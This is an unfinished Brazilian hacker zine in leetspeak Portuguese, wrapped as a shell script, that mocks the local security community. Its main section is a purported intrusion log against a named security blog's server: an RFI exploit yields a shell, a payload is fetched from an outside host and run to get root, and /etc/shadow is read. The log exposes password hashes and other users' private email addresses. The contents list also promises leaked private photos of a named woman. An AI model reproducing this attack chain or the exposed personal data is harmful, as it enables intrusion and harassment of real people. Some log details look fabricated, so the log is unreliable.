#!/bin/sh
#############################################################################
##                                                                         ##
##                     PR0J3KT M4YH3M BR4Z1L                          	   ##
##               	     rm -rf /whitehats             		   ##
##           	    take back the underground          		           ##
##                                            		                   ##
##                            APR3S3NT4                                    ##
##     	             i sh0t the white hat eDiÇãO 5       		   ##
##                    eDiÇãO eSpeCiAl FiM do mUnDO                         ##
##                                                                         ##
#############################################################################
#                                                                           #
#                                             MMNMM~                        #
#                                          8MM$ZZZZNMM                      #
#                                          8MMOZZZZMMM                      #
#                                          8MMZZ$     MMM          +MM:     #
#                                          8MMZZZ     MMM          +MM:     #
#                                  MMMMMMMNO$$ZZZ  8MMZZZMMNMMMMMMMD$$MMM   #
#                          88D77$NN777$$$77$ZZZZZ$$ZZZZZZZZZZZZZZZZZZZ$ZZNNN#
#                          DDD$$OMM7$$$$$$$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZMMM#
#                          NMMZZZZZZZZZZZZZZZZZZZMM:  MMM  +MM   MMZ  NMM   #
#                          NMMZZZZZZZOZZZZZZZZZZ$MM,  MMM  =MM   MMZ  NMN   #
#                    ,DDO$$ZZZZZZ$$ZZODDDZZZZZMMN  DMM   MN8  MMM  +MM:     #
#                    ,DDO$$OOOZZ$$$ZZZ888ZZZZZNNN  I77   $$I  OOO  ~ZZ,     #
#                    ,MM8ZZDDDZZZZZZOZZZZZZZZONMN                           #
#               ZDD$$$ZZZZZ$$7ZZODDZZZ$$$ZZZZOMMN         i sh0t            #
#               $DD$$$OZZZZ$$$ZZODDZZZ$$$ZZZZZMMN      t3h wh1t3h4t         #
#               OMMZZODDOZZZZZZZZZZZZZZZZZZZZZMMN                           #
#         ~::,::OMMZZZDD8ZZZZ$ZZZZZZZZZZZZZZZZMMN        ed1c40 5           #
#         :DDD$$ZOZZZZ$$ZZZDDDZZ$$$ZZODDDZZZZZMMN                           #
#         ~NNNZZO8DZZZZZZZZOZZZZ$ZZZZZZZOZZZZZNNM                           #
#         ~MMMOZ8DDZZZZZZZOZZOZZZZZZZZZZZZZZZZMMM                           #
#    ?DD$ZZOZZZZ$$$OZODDOZZ$$$ZZODD$ZZ$$$ZZZZZZZZMM   MMM   MM , MMO  NMM   #
# ~~~?DD7$$OZZZZ$$$OZZDDOZZ$$$ZZZDDZZZ$$$ZZZZZZZZNM   MMM   MM   MMO  NMM   #
# :MMNMMZOODDDOZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZNMM   MMO  MMM  +MM:  MMM#
#ZZO8O88$ZZOOOZZODDZZZZZZZZ$$$$$$$$$$$DDDZZZZZ$$$$$OOO+++88Z++888++I8O?++MMM#
#MM$Z$$$$$$$$$Z$DMMZZZZZZ$$$$$$$$$$$$$MMMZZZZZ$$$$$$$$$$$$$$$$$$$$$$$$$$$MMM#
#  MNNDDDDDDDDDDNMNZZZZZODDDDDDDDDDDDDMMMZZZZZDDDDDDDDDDDMMNNMNMMMNNMMNMN   #
#  NNNDDDDDDD8DDNNNZZZOZODDDDDDDDDDDDDMNMOZOZZDD8DDDDDDD8NNNMNNMMMMNMMNNN   #
#                  MMMMMI     MMMMM      MMMMM     DMMMMM                   #
#                  MMMMMI     MMMMM      MMMMM     DMMMMM                   #
#                                                                           #
#                                                                           #
#############################################################################
#...........................................................................#
............................................................................#
##   		<*> ish0tthewhitehat.istwh (siTe of1cial)                  ##
##                                                                         ##
##   		mirrorz                                                    ##
##	        <*> exploit-db.com/docs/istwh/                             ##
##	        <*> packetstormsecurity.org/mag/istwh/                     ##
##	        <*> blog.corujadeti.com.br/allicon/istwh                   ##
##	        <*> oys.com.br/meupaucresca/istwh                          ##
##	        <*> bhack.com.br/istwh                                     ##
##	        <*> websecforum.com.br/istwh                               ##
##	        <*> ashack.com.br/info/istwh                               ##
##	        <*> desafiohacker.com.br/istwh                             ##
##	        <*> defhack.com.br/istwh                                   ##
##                                                                         ##
##                                                                         ##
##   		|*| ish0tthewhitehat@gmail.com |*|                         ##
##                                                                         ##
#############################################################################
###                                                                       ###
##               [-*-] INiTIaLIZiNG ATTAcK VeCTORs                         ##
##               [-*-] BYPaSSING SSH ENCRYPTIoN                            ##
##               [-*-] LetZ GeT ST4Rt3d!!!!!!                              ##
###                                                                       ###
#---------------------------------------------------------------------------#
#                        ;   eQu1p3 3d1t0r14l   ;                           #
#                        `----------------------'                           #
#                                                                           #
#   j3r3m14s j0s3            -> 0 sc4nn3r qu3m BuT0 p4h n01s b3b3r          #
#   sys10g m4rl3y            -> n0 l0gz n0 cr1m3z                           #
#   th3 BSd t3rr0r1sT        -> 3u qu3r0 m41s e qu3 meU p4u cR3sc4          #
#   f4us7o c0d3loko          -> 0 l0c0 m3u, s3 L1g4 n3ss4 f3R4              #
#   c4p1t40 n4S-c1um3nt0     -> p3D3 pr4 s4iR, wh1t3h4t v4g4bUnd0           #
#                                                                           #
#---------------------------------------------------------------------------#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#                                                                           #
#  "Yes, I am a criminal. My crime is that of curiosity. My crime is that   #
#  of judging people by what they say and think, not what they look like.   #
#  My crime is that of outsmarting you, something that you will never       #
#  forgive me for."                                                         #
#                                                                           #
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


                 da w4r 0n da n3t will n3v3r d1e.
                 da int3rn3t enjoyz 0ur w4r, it ph33dz 0ff it.
                 w3 d0 it ph0r da thr1ll.
                 we d0 1t ph0r the luv.
                 th0u sh411 truzt n0 0n3.


#############################################################################
              =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
                              -=-=] INTRO [=-=-
              =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
#############################################################################

1; intro
2; corujito r3l04d3d
3; LV architecture
4; 0day extravaganza
5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs
6; pwnie awards braSil
7; outr0

#############################################################################


-----------------------------------------------------------------------------------------
1; intro
-----------------------------------------------------------------------------------------

            \
             \         
             |\      
             /|          Entao voce trabalha com seguranca?
            /'|             
          ,' //            Conte-nos mais sobre aquele Blog
        ,'..`/                   que voce roda em Wordpress...
       /   '/                                                          _...._.---._
     /:   ,'                                                         .' ,--. ,--.  \
   ,'    ,                                                           | /... /...|  |,..._
  ,'    /                                   _..---------..__         \.\_O_/  O /  '     \
 .'  _, /                 .---..._       ,-'  __.-.....__   '-  ___.-----._'---'     ,'  |
 |-`'  (                  |       `--..,'_,-''   '.     `''"-._( .-.'.--.         _.'   /
 |      \                 |  ,.__     /,'  |      |      \     \ | / |  /      ,,'  __ /
 |     .`.               /  .'  _)--..'    |       |     '\     \`  ..--:`     _.--' \
 |   .'  .-.__           |  |,-' _.-\      |       |      |     |`\''''''''_.-'   ,' (
  \         ,-`''-- =--::|   \-'|    |     |       |      |     | `'.....-' .,:-'  |  \
   `.    ,  /  /     '`. |   |  |    |     |       |      |     |  \__.-` `..      \   \
    '.  /  /  /         '|   |  |    [     |       |       |    |    ,       '._    |  |
      `.  /  | .--------'    `-. |   '     |       |       |    |,L______       `--..   \
        ``.  | \               |-^---''".  |      |       .'    |.'      ``-..._         \
           `.-..\.__...---....,'-.....--'`'"-........_____|.. `'                `'`--..../ 


n0v1d4d3s d4 5a 3d1c4o:

c0mpr4m0s n0ss0 TLD pr0pr10 c0m a d0aca0 d3 5.000k d0l4r3s d0 c0ruj1t0 - ish0tthewhitehat.istwh
pub1ic40 d3 0d4yz de p3squ1s4ad0r3s r3n0m4d0s d4 c0mun1d4d3 br4aSil3ir4
pwni3 4w4rds v3rs40 tup1n1qu1m, c0m o anch1ses no c0m1t3 org4n1z4d0r
em41l p3ss041 d4 c4r01 (b0zz4) l3ak3d c0m f0tOs p1C4nt3s


xxxxx
(ja ta pronto, depois vou colar o resto do intro, trocar ordem)
		   
-----------------------------------------------------------------------------------------
2; corujito r3l04d3d
-----------------------------------------------------------------------------------------

xxx

umad:~/pentest/cusom/# ./l1c34n4 -h blog.corujadeti.com.br/xmlrpc.php -p 80 -v6 -rfi=list.txt

    [+] l1c34n4 xplt - priv8 priv8 priv8 [+]
    [+] target: 2804:10:5::89:144        [+]
    [+] nginx Port: 80                   [+]
    [+] rfi list: list.txt               [+]
    [+] finding offset...                [+]
    [+] testing for rfi                  [+]
    [+] g0tsh3ll!                        [+]

sh-3.3$ export HISTFILE=/dev/null

sh-3.3$ echo 3u qu3r0 m4is eh qu3 m3u p4u cr3sc4
3u qu3r0 m4is eh qu3 m3u p4u cr3sc4

sh-3.3$ whoami
corujadeti

sh-3.3$ id
uid=724(corujadeti) gid=725(corujadeti) groups=504(tar),725(corujadeti)

sh-3.3$ env
PHPRC=/usr/local/fastcgi/php.ini/php.corujadeti.ini
USER=root
FCGI_WEB_SERVER_ADDRS=127.0.0.1
PHP_FCGI_CHILDREN=10
PATH=/usr/bin:/bin
PWD=/home/corujadeti/www/blog/
SHLVL=1
PHP_FCGI_MAX_REQUESTS=10000
_=/usr/bin/env

sh-3.3$ df -ah
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              35G   19G   15G  56% /
proc                     0     0     0   -  /proc
sysfs                    0     0     0   -  /sys
devpts                   0     0     0   -  /dev/pts
/dev/sda3              11G  529M   11G   5% /var
none                     0     0     0   -  /proc/sys/fs/binfmt_misc
tmpfs                 1.0G   77M  948M   8% /tmp
/dev/sdb1             250G  242G  8.1G  97% /home
tmpfs                 1.0G  172M  853M  17% /home/logs

sh-3.3$ uname -an
Linux web331.kinghost.net 2.6.37 #1 SMP Tue Jan 25 13:31:03 BRST 2011 x86_64 x86_64 x86_64 GNU/Linux

// m0m3nt0 j4ilbr3ak

sh-3.3$ wget http://netclass.oys.com.br/dadinho
--12:11:34--  http://netclass.oys.com.br/dadinho
Resolving netclass.oys.com.br... 91.121.96.193
Connecting to netclass.oys.com.br|91.121.96.193|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `dadinho'

sh-3.3$ chmod +x dadinho

sh-3.3$ ./dadinho
  [+] echo "dadinho eh o caralho"
  [+] tr dadinho joao_pequeno
  [+] mv /bangu/joao_pequeno /home/joao_pequeno
  [-] invalid permissions, trying alternative method
  [+] mail michaelscofield@prisonbreak.com < escape
  [+] successful jailbreak!
  [+] g0tr00t
  
sh-3.3# cat /etc/shadow | grep corujadeti
corujadeti:$1$abcde$ppjcWUbkHyesBXgD5e12w/:15333:0:99999:7:::

sh-3.3# cat /etc/passwd | grep corujadeti
corujadeti:x:724:725::/home/corujadeti:/bin/bash

sh-3.3# cat /etc/group | grep corujadeti
tar:x:504:videoclubofsex,sabia,guiadeautopecas,chutimetro,provider,
megapremiumbr,aprenderemead,redcon,x-flog,nacaojovemmineiros,ponoticias,
agrorural,pibpin,curt,rockup,cwkweb,ateliercosturacurso,coelhinhasluxo,
pccareinfo,rccrc,corujadeti,infogameslitoral,clinicafonoaudiologica,
marciodias,saomarcos
corujadeti:x:725:

sh-3.3# cat /var/tmp/.historico.bloqueado
15/06/2012 09:17 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 09:47 de [joao.mt.2005@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:18 de [migsgfe@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:29 de [robertocesar.direito@hotmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:54 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:05 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:38 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:53 de [gustcol@gmail.com] para [gustcol@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo

xxxxx

-----------------------------------------------------------------------------------------
3; LV architecture
-----------------------------------------------------------------------------------------

xxxxx
colar logs petrobras
oys, ja conseguiu root ou ta soh com o shell do moodle?

-----------------------------------------------------------------------------------------
4; 0day extravaganza
-----------------------------------------------------------------------------------------

xxxxx
esperar keynote acabar, nao esquecer de passar no banheiro (foto)

-----------------------------------------------------------------------------------------
5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs
-----------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------
6; pwnie awards braSil
-----------------------------------------------------------------------------------------

>  m31h0r r3sp0ns1b13 d1scl0sur3

http://seclists.org/fulldisclosure/2012/Feb/264

BSDaemon, Conviso & Kousuke Ebihara

>  m3lh0r d1scuss40 n0 tw1773r

jczucco x gustcol

jmmrabelo x lv architecture

> m3lh0r p4l3str4 n40 ac31t4

mphx2

> m3lh0r s3nh4 de CISSP n0 linkedin


xxx
ACABA DE ESCREVER LOGO PESTE

-----------------------------------------------------------------------------------------
7; outr0
-----------------------------------------------------------------------------------------
xxx

-----------------------------------------------------
| C0nTr1bu4m p4r4 0 ca0s ish0tthewhitehat@gmail.com |
-----------------------------------------------------